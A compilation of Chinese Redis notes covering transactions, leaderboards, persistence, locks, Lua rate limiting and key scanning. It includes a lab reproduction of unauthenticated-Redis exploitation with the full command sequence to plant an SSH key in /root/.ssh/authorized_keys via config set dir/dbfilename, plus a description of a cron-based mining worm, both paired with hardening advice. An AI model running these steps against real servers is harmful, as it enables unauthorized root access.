Redis 的事务处理的命令

MULTI:开启一个事务;
EXEC:事务执行,将一次性执行事务内的所有命令;
DISCARD:取消事务;
WATCH:监视一个或多个键,如果事务执行前某个键发生了改动,那么事务也会被打断;
UNWATCH:取消 WATCH 命令对所有键的监视。

需要说明的是 Redis 实现事务是基于 COMMAND 队列,
如果 Redis 没有开启事务,那么任何的 COMMAND 都会立即执行并返回结果。
如果 Redis 开启了事务,COMMAND 命令会放到队列中,并且返回排队的状态 QUEUED,
只有调用 EXEC,才会执行 COMMAND 队列中的命令。
玩家排行榜案例

统计全部玩家的排行榜
ZREVRANGE user_score 0 -1 WITHSCORES

按名次查询排名前 N 名的玩家
统计前 10 名玩家,可以使用:ZREVRANGE user_score 0 9

查询某个玩家的分数
查询玩家 10001 的分数可以使用:ZSCORE user_score 10001

查询某个玩家的排名
查询玩家 10001 的排名可以使用:ZREVRANK user_score 10001

对玩家的分数和排名进行更新
对玩家 10001 的分数减 1,可以使用:ZINCRBY user_score -1 10001

查询指定玩家前后 M 名的玩家
查询玩家 10001 前后 5 名玩家都是谁,当前已知玩家 10001 的排名是 18036
那么可以使用:ZREVRANGE user_score 18031 18041

增加或移除某个玩家,并对排名进行更新
删除玩家 10001,可以使用:ZREM user_score 10001
查询下排名在 1803118041 的玩家是谁,使用:ZREVRANGE user_score 18031 18041

把玩家 10001 的信息再增加回来,使用:ZADD user_score 93.1504697596 10001
看下排名在 1803118041 的玩家是谁,使用:ZREVRANGE user_score 18031 18041
https://learnku.com/articles/37066

redis安全

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
Redis 默认情况下,会绑定在 0.0.0.0:6379,在没有利用防火墙进行屏蔽的情况下,将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下利用 Redis 的相关方法,可以成功将自己的公钥写入目标服务器的 ~/.ssh 文件夹的 authotrized_keys 文件中,进而可以直接登录目标服务器;如果 Redis 服务是以 root 权限启动,可以利用该问题直接获得服务器 root 权限。

经过对捕获的事件进行分析,整个入侵流程大概是包含以下几个环节:

扫描开放 6379 端口的 Linux 服务器(后续感染扫描网段为 1.0.0.0/16224.255.0.0/16
通过 redis-cli 尝试连接 Redis 并执行预置在.dat 文件里的利用命令将 Redis 的数据文件修改为 /var/spool/cron/root,然后通过在 Redis 中插入数据,将下载执行脚本的动作写入 crontab 任务
通过脚本实现以上的相关行为,完成植入并启动挖矿程序
Redis 服务加固

导致入侵的主要原因是 Redis 未授权访问问题,所以如果要扼制入侵的入口,需要针对 Redis 服务进行加固,避免黑客通过该途径进行入侵植入挖矿蠕虫。
如无必要,修改 bind 项,不要将 Redis 绑定在 0.0.0.0 上,避免 Redis 服务开放在外网,可以通过 iptables 或者腾讯云用户可以通过安全组限制访问来源
在不影响业务的情况,不要以 root 启动 Redis 服务,同时建议修改默认的 6379 端口,大部分针对 Redis 未授权问题的入侵都是针对默认端口进行的
配置 AUTH,增加密码校验,这样即使开放在公网上,如果非弱口令的情况,黑客也无法访问 Redis 服务进行相关操作
使用 rename-command CONFIG "RENAME_CONFIG"重命名相关命令,这样黑客即使在连接上未授权问题的 Redis 服务,在不知道命令的情况下只能获取相关数据,而无法进一步利用 https://www.v2ex.com/t/584369
docker 的 -p 如果直接 6379:6379 是会默认绑定 0.0.0.0 的,而且还会自动打开防火墙的这个端口,不注意很容易被坑的,必须要-p 127.0.0.0:6379:6379 这样用才行
Redis 也被挖矿攻击! https://cn.v2ex.com/t/623847#reply27
// 它这个脚本保存在 value 里,怎么才能被执行到 显然 redis 公网开放,并且无认证 如果 redis 被恶意程序访问到了,那么可以利用

config set dir xxx
config set dbfilename xxxx
set xxx
save

这几条命令在 linux 目录下创建文件。 https://p0sec.net/index.php/archives/69/

Redis scard主从延时问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
function setPrize($arrPrizes) {
try {
// 真实的奖品是由上面的参数$arrPrizes传入,数据格式如下:
// $arrPrizes = array(
// array('code' => 'A0001', 'name' => 'iPhone'),
// array('code' => 'A0002', 'name' => 'iPhone'),
// );
foreach ($arrPrizes as $intIndex => $arrPrize) {
$arrPrizes[$intIndex] = json_encode($arrPrize);
}

// 获取Redis实例
$objRedis = RedisUtil::getInstance();
$strRedisKey = 'www.daemoncoder.com';
$arrPrizePages = array_chunk($arrPrizes, 100);
foreach ($arrPrizePages as $arrPrizePage) {
// 分批写入redis中
$intAddResult = $objRedis->sAddArray($strRedisKey, $arrPrizePage);
echo sprintf("AddResult: %s\n", var_export($intAddResult, true));
}

// 判断写入的集合最终大小是否和传入的数组大小一致
// 不一致则中间有数据没有成功写入,需要返回给上层重试或者报警
$intScardResult = $objRedis->sCard($strRedisKey);
echo sprintf("ScardResult: %s\n", var_export($intScardResult, true));
if ($intScardResult == count($arrPrizes)) {
return true;
}
} catch (Exception $e) {
var_dump($e);
}
return false;
}
通过sAddArray()写入集合的数据,有部分还没有生效。Redis本身用单线程处理请求,理论不应该存在出现这种延时,但是线上环境的Redis往往都是主从结构的,主库到从库同步数据是会有延时的,这也是出现这个问题的真实的原因。
上述代码中用RedisUtil::getInstance()来获取redis实例,前面也有介绍,这个是我们自己封装的Redis工具类,会根据不同的redis命令做读写分离。sAddArray()是一个写请求,会自动选择主库连接执行,而sCard()是一个读请求,默认会选择从库去执行。所以会出现用sCard()读取不到集合真实的大小,因为从库此时可能还没有同步到最新的数据。
解决方案

调整代码,强制让sCard()方法选择主库(每个人连接的Redis工具类不同,这里不再贴代码,大概的方式就是连接时指定主库的IP)。这样经过多次反复测试,没有再出现这个问题。
https://www.daemoncoder.com/a/%E8%AE%B0%E4%B8%80%E6%AC%A1Redis%20scard%E8%AF%BB%E5%8F%96%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%9C%E4%B8%8D%E5%AF%B9%E7%9A%84%E9%97%AE%E9%A2%98/4d54673d?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io

redis数据持久化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
edis作为内存数据库,一共支持2种数据持久化方案:RDB、AOF。这两种方案把数据存储到磁盘中,既可以同时使用,也可以单独使用,甚至都不使用,具体使用可以配置。
把数据存储到磁盘主要是为了以后重用数据,或者防止系统出现故障而将数据备份到远程位置。
rdb的主要原理是在某个时间点,把内存中所有的数据做一份快照,然后把快照中的数据保存在磁盘中。
save 900 1 #900秒时间,至少有一条数据更新,则保存到数据文件中
save 300 10 #300秒时间,至少有10条数据更新,则保存到数据文件中
save 60 10000 #60秒时间,至少有10000条数据更新,则保存到数据文件中
stop-writes-on-bgsave-error yes
rdbcompression yes 指定存储至本地数据库时是否压缩数据,默认是yes,redis采用LZF压缩,如果为了节省CPU时间可以关闭该选项,但会导致数据库文件扁的巨大
rdbchecksum yes 对rdb文件进行校验
dbfilename "dump.rdb"
dir "XXX"
当redis的bgsave命令触发时:会fork一个新进程,在新进程中进行处理快照的操作,主进程依旧可以执行别的请求。

aof持久化是将被执行的写命令,写到aof文件的末尾,以此来记录数据的变化。
appendonly no #是否开启aof。默认是关闭的
# appendfsync always # always:表示每次redis写操作都会同步写入磁盘,这样会严重降低redis速度。
appendfsync everysec # everysec:表示每秒同步一次(折衷,默认值),通过redis的时间事件
# appendfsync no # no:表示redis不主动同步aof数据。等操作系统进行数据缓存同步到磁盘(快)

其实redis的bgrewriteaof命令跟bgsave命令非常相似。都是创建一个子进程,把当前的数据创建一份快照,由子进程进行保存,然后替代以前的aof文件(并不是追加都文件末尾)。
比较关心数据,但是可以忍受几分钟数据的丢失,可以使用rdb;
不建议只使用aof:因为rdb文件是恢复数据、复制数据的最好的办法;
如果对数据要求特别高,可以同时使用两种方案;
https://bettercuicui.github.io/2018/04/01/REDIS/redis%E6%95%B0%E6%8D%AE%E6%8C%81%E4%B9%85%E5%8C%96_RDB_AOF/

基于redis实现分布式锁

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ret = $this->getCon()->setnx($key,1);
if(1 == $ret){
do something...
$this->getCon()->del($key);
}
$this->getCon()->multi();
$this->getCon()->setnx($key,1);
$this->getCon()->EXPIRE($key,$time);
$this->getCon()->exec();
$ret = $this->getCon()->set($key,1,array('nx','ex'=>self::EXP_TIME));
if(1 == $ret){
do something...
$this->getCon()->del($key);
}
$ret = $this->getCon()->set($key,$random,array('nx','ex'=>self::EXP_TIME));
if(1 == $ret){
do something...
if($random == $this->getCon()->get($key)){
$this->getCon()->del($key);
}
}
if redis.call("get",KEYS[1]) == ARGV[1] then
return redis.call("del",KEYS[1])
else
return 0
end
https://bettercuicui.github.io/2018/04/01/REDIS/%E5%9F%BA%E4%BA%8Eredis%E5%AE%9E%E7%8E%B0%E5%88%86%E5%B8%83%E5%BC%8F%E9%94%81/

Redis 使用 lua 脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
减少网络开销,一个脚本包含多个命令
原子操作, redis 是单线程的,Redis 的 API 是原子性的操作,所以一个脚本在 Redis 里面是作为一个整体执行,中途不会被插入其他操作,脚本本身就是事务,更简单,速度更快
可复用,客户端发送的脚步会永久存在 redis 中,这样,其他客户端可以复用这一脚本而不需要使用代码完成相同的逻辑
# KEYS和ARGV中间的 ',' 两边的空格,不能省略。
Redis-cli -h address -p port --eval path/to/redis.lua KEYS[1] KEYS[2] , ARGV[1] ARGV[2]

$redisHost = '127.0.0.1';
$redisPort = 6379;
//实例化redis类
$redis = new Redis();
$redis->connect($redisHost, $redisPort);
$lua = <<<SCRIPT
return {KEYS[1],KEYS[2],ARGV[1],ARGV[2]}
SCRIPT;
//对应的redis命令如下 eval "return {KEYS[1],KEYS[2],ARGV[1],ARGV[2]}" 2 key1 key2 first second
//2表示KEYS的值为前2个,剩下的参数为ARGV
$s = $redis->eval($lua,array('key1','key2','first','second'),2);
var_dump($s);
https://learnku.com/articles/37766

redis未授权&弱密码漏洞复现和防护

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
vi /etc/redis/redis.conf,注释掉bind 127.0.0.1 ::1即让redis监听所有网段
$ redis-cli -h 192.168.99.100
192.168.99.100:6379> info
写ssh公钥实现远程登陆

首先生产密钥对:

ssh-keygen -t rsa
将公钥制作成上传文件:

(echo -e "\n\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n\n") > upload.txt
将上传文件保存在redis-cli的临时变量中:

cat ~/upload.txt | redis-cli -h 192.168.99.100 -x set tmp
连接redis,将tmp变量的内容写入/root/.ssh/authorized_keys:


redis-cli -h 192.168.99.100
config set dir /root/.ssh
config set dbfilename authorized_keys
get tmp
save
接着使用私钥即可登陆靶机:

ssh -i ~/.ssh/id_rsa root@192.168.99.100

写crontab文件反弹shell

crontab跟ssh差不多,但是笔者再ubuntu18.04中复现失败,原因是写入的crontab文件存在redis的一些字符,导致格式不正确
使用apt install redis-server的方式安装,并且使用service redis start启动redis,这样redis会在一个低权限用户下运行
[root@VM_0_11_centos ~]# ps -ef |grep redis
redis 2538 1 0 Nov14 ? 00:25:57 /usr/bin/redis-server 127.0.0.1:6379
root 16915 8467 0 11:06 pts/0 00:00:00 grep --color=auto redis

若必须以root身份运行,为redis设置一定强度的密码(实际复现中我们可以发现,新版redis在以root运行,不设置密码的情况下会启动保护模式,只允许本地cli)
定时检查redis日志
cat /etc/redis.conf |grep logfile
logfile /var/log/redis/redis.log
[root@VM_0_11_centos ~]# more /var/log/redis/redis.log
https://anemone.top/%E7%BB%84%E4%BB%B6-redis%E6%9C%AA%E6%8E%88%E6%9D%83-%E5%BC%B1%E5%AF%86%E7%A0%81%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%92%8C%E9%98%B2%E6%8A%A4/

删除大key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96

vendor/predis/predis/src/Collection/Iterator/Keyspace.php:22
laravel predis https://github.com/nrk/predis/blob/v1.0/examples/redis_collections_iterators.php

for ($i = 0; $i < 5; ++$i) {
$client->sadd('predis:set', "member:$i");
$client->zadd('predis:zset', -$i, "member:$i");
$client->hset('predis:hash', "field:$i", "value:$i");
}
// === Keyspace iterator based on SCAN ===
echo 'Scan the keyspace matching only our prefixed keys:', PHP_EOL;
foreach (new Iterator\Keyspace($client, 'predis:*') as $key) {
echo " - $key", PHP_EOL;$client->del($key);
}
/* OUTPUT
Scan the keyspace matching only our prefixed keys:
- predis:zset
- predis:set
- predis:hash
*/
function scanAllForMatch ($pattern, $cursor=null, $allResults=array()) {

// Zero means full iteration
if ($cursor==="0") {
return $allResults;
}

// No $cursor means init
if ($cursor===null) {
$cursor = "0";
}

// The call
$result = Redis::scan($cursor, 'match', $pattern);

// Append results to array
$allResults = array_merge($allResults, $result[1]);

// Recursive call until cursor is 0
return scanAllForMatch($pattern, $result[0], $allResults);
}
$allResults = scanAllForMatch('*keypattern*');https://stackoverflow.com/questions/35477172/laravel-and-redis-scan
$redis->pconnect($redisConf[0], $redisConf[1], $timeout);
//默认SCAN_NORETRY情况下有可能会返回空数组,设置成SCAN_RETRY,如果是空数组的话,将不返回继续扫描下去
$redis->setOption(\Redis::OPT_SCAN, \Redis::SCAN_RETRY);
$it = NULL;
while ($arr_keys = $redis->scan($it, CacheKeyConfig::CachePre.'*')) {
if (is_array($arr_keys)) {
//推荐使用unlink函数,非阻塞删除,删除大key时很好用,但是它需要redis版本>=4.0
$result = $redis->del($arr_keys);
echo $result . PHP_EOL;
}
}


链接:https://juejin.im/post/5cf4e52e6fb9a07ecd3d46fe
$it = NULL;
while($arr_keys = $redis->scan($it, "mykey:*", 10000)) {
foreach($arr_keys as $str_key) {
echo "Here is a key: $str_key\n";
}
}
$pattern_arr=[];
$pattern_arr['COUNT'] = 10;
$cursor = null;$i=0;
while($cursor !== 0){
// 命令位置 vendor\predis\predis\src\Command\HashScan.php
$info = $redis->hscan('news:all', $cursor, $pattern_arr);
$cursor = intval($info[0]);dump(count($info[1]));
$list = $info[1] ?$info[1]: [];$i++;
if($list){
$del_field = [];
foreach($list as $field=>$v){
$del_field[] = $field;
}
dump(count($del_field),$i);
$redis->hdel('news:all', $del_field);
if ($i > 100) {
break;
}
}
}
$cursor = 0;$i=0;
do
{
// $arr_keys = $redis->scan($it, 'app:read:news:uuid:*', $pattern_arr);
$arr_keys = $redis->scan($cursor, 'match', 'app:read:news:uuid:*');dump($arr_keys);
if (is_array($arr_keys) && !empty($arr_keys))
{
foreach ($arr_keys as $str_key)
{
dump($str_key);
}
}
} while ($arr_keys !== false);
http://doc.redisfans.com/key/scan.html

redis中的并发问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
require "vendor/autoload.php";
//https://www.cnblogs.com/iforever/p/5796902.html
$client = new Predis\Client([
'scheme' => 'tcp',
'host' => '127.0.0.1',
'port' => 6379,
]);

for ($i = 0; $i < 1000; $i++) {
$num = intval($client->get("name"));
$num = $num + 1;
$client->setex("name", $num, 10080);
usleep(10000);
}
设置name初始值为0,然后同时用两个终端执行上面的程序,最后name的值可能不是2000,而是一个<2000的值,这也就证明了我们上面的并发问题的存在
redis中命令是满足原子性的,因此在值为阿拉伯数字的时候,我可以将get和set命令修改为incr或者incrby
for ($i = 0; $i < 1000; $i++) {
$client->incr("name");
$client->expire("name", 10800);
usleep(10000);
}
非数字那只能用watch、multi、exec了

1)setnx(lockkey, 当前时间+过期超时时间) ,如果返回1,则获取锁成功;如果返回0则没有获取到锁,转向2
2.)get(lockkey)获取值oldExpireTime ,并将这个value值与当前的系统时间进行比较,如果小于当前系统时间,则认为这个锁已经超时,可以允许别的请求重新获取,转向3
3.)计算newExpireTime=当前时间+过期超时时间,然后getset(lockkey, newExpireTime) 会返回当前lockkey的值currentExpireTime。
4.)判断currentExpireTime与oldExpireTime 是否相等,如果相等,说明当前getset设置成功,获取到了锁。如果不相等,说明这个锁又被别的请求获取走了,那么当前请求可以直接返回失败,或者继续重试。
5) 在获取到锁之后,当前线程可以开始做自增操作,当处理完毕后,比较自己的处理时间和对于锁设置的超时时间,如果小于锁设置的超时时间,则直接执行delete释放锁;如果大于锁设置的超时时间,则不需要再锁进行处理

Redis 使用 Lua 脚本替代 SETNX / DECR 保证原子性

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
   /**
* TRUE: 触发限流,FALSE:未触发限流
*/
public function acquire() {
try {
$redisHandler = $this->redisInstance->getHandler();
$redisHandler->set($this->rateLimitKey, $this->tokenNum, ['nx', 'ex' => $this->expireTime]);
$leftTokenNum = $redisHandler->decr($this->rateLimitKey);
if ($leftTokenNum < 0) {
return TRUE;
}
return FALSE;
} catch (\Exception $e) {
return FALSE;
}
}
使用 redis 来起到一个限流的作用,1 秒钟只允许 1 人购买
$redis->set('key', '1', ['nx', 'ex'=>1]); 命令,设置值为 1 过期时间为 1 秒的计数器,基于该计数器的扣减来达到 1 秒钟放行 1 个请求的目的。

$key = 'test_redis_key';
$redis->set($key, '1', ['nx', 'ex' => 1]);
$left = $redis->decr($key);

if ($left < 0) {
// 这里通过状态码来更方便的观察
header('Is-Limited:1', true, 500);
} else {
header('Is-Limited:0', true, 200);
}
在 Redis key 未过期之前,DECR 命令都是正常扣减的。一旦 key 过期了,再执行 DECR 命令,会发现 key 的值和过期时间都变为 -1 了。
假设在第一句 SETNX 之后第二句 DECR 之前,key 过期了,再执行 DECR 就会先生成一个永不过期值为 0 的 key。

之后所有请求的 SETNX 都是 fasle,一直会基于这个永不过期的 key 进行递减,所有的 $leftTokenNum 都小于 0,因此导致所有请求被限流。

$key = 'test_redis_key';
$redis->set($key, '3', ['nx', 'px' => 5]); // key 设置成 5 毫秒过期
$left = $redis->decr($key);

if ($left < 0) {
// 这里通过状态码来更方便的观察
header('Is-Limited:1', true, 500);
} else {
header('Is-Limited:0', true, 200);
}
> eval "return {KEYS[1],KEYS[2],ARGV[1],ARGV[2]}" 2 key1 key2 first second
1) "key1"
2) "key2"
3) "first"
4) "second"

$key = 'test_redis_key1';

$script = <<<LUA
local max = tonumber(ARGV[1])
local interval_milliseconds = tonumber(ARGV[2])
local current = tonumber(redis.call('get', KEYS[1]) or 0)

if (current + 1 > max) then
return true
else
redis.call('incrby', KEYS[1], 1)
if (current == 0) then
redis.call('pexpire', KEYS[1], interval_milliseconds)
end
return false
end
LUA;

$redis->script('load', $script);
$isLimited = $redis->eval($script, [$key, 1, 5], 1); // key 5 毫秒过期

if ($isLimited) {
header('Is-Limited:1', true, 500);
} else {
header('Is-Limited:0', true, 200);
}
Redis 中 DECR 一个不存在的 key 会先把 key 值设置为 0 , TTL 设置为 -1 (永不过期),再进行减 1 操作。
使用 SETNX 配合 DECR 实现限流,会出现 key 永不过期情况。过期时间比较小或者高并发情况下,发生概率更高。
在 Redis 中执行 Lua 脚本是原子操作。
可以通过 Redis + Lua 实现高并发下的限流。https://learnku.com/articles/39265

Redis 使用手册 PHP 代码实现

Redis 中 Keys 与 Scan 的使用

Redis 命令大全

Redis 命令行工具的妙用

redis过期数据存储方式以及删除方式

redis超时问题排查

分布式和redis

Redis 主从复制详细解读

从缓存穿透聊到布隆过滤器

基于redis的秒杀

Redis 为什么使用单进程单线程方式也这么快

面试时你可能需要的 Redis 知识技巧

Redis 一站式管理平台工具ngbdf/redis-manager

Kafka学习之路

redis限流

Redis & 常用用法详情

Redis 应用-分布式锁

命令行的 Redis

Redis 简单入门

50道Redis面试题史上最全

MYSQL性能优化学习笔记-(1)数据库设计

Redis In Action 笔记

redis缓存雪崩、缓存穿透、缓存更新了解多少?github.com/ZhongFuCheng3y/3y

Redis 基础学习

Redis bitmap 在微擎内做公众号的签到活动

Redis In Action 笔记

使用缓存的正确姿势

Redis问题汇总

Redis 的第 n 次涉及

epoll 的本质是什么